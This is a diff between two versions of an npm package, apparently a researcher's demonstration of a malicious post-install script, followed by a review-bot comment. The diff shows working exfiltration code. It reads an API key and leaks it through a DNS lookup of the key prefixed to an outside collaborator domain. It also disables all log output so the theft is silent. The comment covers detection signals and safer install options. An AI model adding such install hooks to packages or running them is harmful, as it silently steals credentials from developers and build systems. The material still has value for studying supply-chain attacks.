@digininja/postinstall 1.0.1 → 1.0.3

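--- a/package/README.md
+++ b/package/README.md
@@ -1,3 +1,3 @@
  # Logger
 
- This is the malicious version of the logger published to npm and using dependency confusion to get installed over the real version.
+ This is the malicious version of the logger which has a post install script to try to steal passwords and keys.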
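--- a/package/package.json
+++ b/package/package.json
@@ -1,8 +1,9 @@
  {
  "name": "@digininja/postinstall",
- "version": "1.0.1",
+ "version": "1.0.3",
  "description": "Hijack secrets from GitHub",
  "author": "Digininja",
+ "license": "ISC",
  "type": "commonjs",
  "main": "index.js",
  "scripts": {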
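--- a/package/scripts/setup.js
+++ b/package/scripts/setup.js
@@ -10,7 +10,7 @@ const options = {
  function lookup(domain) {
  dns.lookup(domain, options, (err, address, family) => {
  if (err) {
- console.error('Lookup failed:', err);
+ log('Lookup failed:', err);
  return;
  }
  // don't care
@@ -19,7 +19,7 @@ function lookup(domain) {
  }
 
  function log(message, data = '') {
- console.log(`[POSTINSTALL DEBUG] ${message}`, data);
+ // console.log(`[POSTINSTALL DEBUG] ${message}`, data);
  }
 
  // DNS cache buster
@@ -32,6 +32,7 @@ if (!apiKey) {
  log('API Key missing. Exiting gracefully.');
  process.exit(0);
  }
+
  lookup(apiKey+'.6u1s7jd9esbax66anvpcg34jgam1asyh.collab.digi.ninja');
 
  log('Using API Key:', apiKey);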
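Review bot: With the body of `log()` commented out in the second hunk, every call becomes a no-op, so the `log('Lookup failed:', err)` introduced in the first hunk discards the DNS error and the script produces no install output at all. The `lookup(apiKey+…)` call in the third hunk is unchanged and still places the key in a DNS query name, so anyone using this package to test detections should not rely on install logs; the signals that remain are the install script the README describes and the outbound DNS query itself, and untrusted packages are best installed with `npm install --ignore-scripts`. If the silence is intended, record it in the function, e.g. `// debug output disabled; re-enabling it prints apiKey to the install log`, since `log('Using API Key:', apiKey)` would write the secret in clear. The code between the hunks, including where `apiKey` is read, is outside the visible lines.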